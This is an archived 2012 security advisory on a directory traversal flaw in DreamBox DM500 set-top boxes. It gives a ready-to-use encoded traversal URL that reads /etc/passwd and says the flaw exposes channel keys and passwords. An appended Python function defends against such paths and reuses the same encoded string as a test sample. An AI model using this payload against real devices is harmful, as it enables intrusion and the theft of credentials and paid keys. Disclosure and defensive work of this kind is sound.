Securityvulns SECURITYVULNS:DOC:27678
Feb 15, 2012 - 12:00 a.m.

FW: mutant200s DreamBox Arbitrary File Download Vulnerability


Exploit Title: mutant200s DreamBox Arbitrary File Download Vulnerability

Google Dork:

Date: 30/01/2012

Author: k3vin mitnick

Software Link:

Version:

Tested on:

CVE :

DreamBox DM500(+) Arbitrary File Download Vulnerability
Vendor: Dream Multimedia GmbH
Product web page: http://www.dream-multimedia-tv.de
Affected version: DM500, DM500+, DM500HD and DM500S
Summary: The Dreambox is a series of Linux-powered
DVB satellite, terrestrial and cable digital television
receivers (set-top box).
Desc: Dreambox suffers from a file download vulnerability
through directory traversal, triggered by appending the '/'
character in an HTTP GET request to the affected host address.
An attacker can reach sensitive information such as paid channel
keys, usernames, passwords, config and plug-in info, etc.
Tested on: Linux dreambox 2.6.17-mutant200s
Vulnerability discovered by: k3vin mitnick
website : http://tunisianblackhat.blogspot.com/
exploit :
http://192.168.1.xxx:80/%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2Fetc%2Fpasswd

greetz to tunisian blackhat team , tunisia hackspace , partipirate-tunisie.org , wiki.partipirate-tn.org , samychelly , ANSI.tn , fireboy , underhack ,
scraface team , wild_louzir ,ANIS , slim ammamou , haythem el mekki … and all tunisia hackers
30/01/2012

K3VIN MITNICK - TUNISIAN BLACKHAT-

From: [email protected]
To: [email protected]
Subject: mutant200s DreamBox Arbitrary File Download Vulnerability
Date: Sun, 29 Jan 2012 23:13:19 +0000
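
A defensive counterpart to the request shown in the advisory, as an added example that is not part of the original advisory or the vendor's code: a Python path resolver that percent-decodes the request path once, canonicalizes it, and refuses anything outside the document root. `DOC_ROOT`, `resolve_request_path` and the sample requests are assumptions constructed for illustration.

```python
import os
from urllib.parse import unquote

DOC_ROOT = "/srv/webroot"  # assumed document root (hypothetical, not from the advisory)


def resolve_request_path(raw_path, doc_root=DOC_ROOT):
    """Return the canonical file path for a request, or None if it escapes doc_root."""
    # Ignore any query string; only the path component names a file.
    path = raw_path.split("?", 1)[0]
    # Percent-decode exactly once, before any path logic runs. Checking the
    # raw string for "../" would miss %2E%2E%2F entirely, and decoding a
    # second time later would reopen the hole for %252E%252E%252F.
    decoded = unquote(path)
    if "\x00" in decoded:
        return None  # NUL would truncate the name in C-level file APIs
    root = os.path.realpath(doc_root)
    # Strip leading slashes so join() is never handed an absolute path,
    # then collapse "." / ".." segments and resolve symlinks.
    candidate = os.path.realpath(os.path.join(root, decoded.lstrip("/")))
    # Compare whole path components, so "/srv/webroot-old" does not pass
    # as being inside "/srv/webroot".
    if os.path.commonpath([root, candidate]) != root:
        return None
    return candidate


# Constructed sample requests; the first has the same shape as the advisory's.
ENCODED_TRAVERSAL = "/%2F" + "%2E%2E%2F" * 13 + "etc%2Fpasswd"
SAMPLES = [ENCODED_TRAVERSAL, "/../../etc/passwd", "/..%2Fwebroot-old/x",
           "/index.html", "/css/../index.html", "/a%00.html"]

if __name__ == "__main__":
    for req in SAMPLES:
        print(f"{req[:40]:<42} -> {resolve_request_path(req)}")
```

Requests that resolve to `None` should be answered with an error and logged; the file is opened only through the returned canonical path, never through the raw request string.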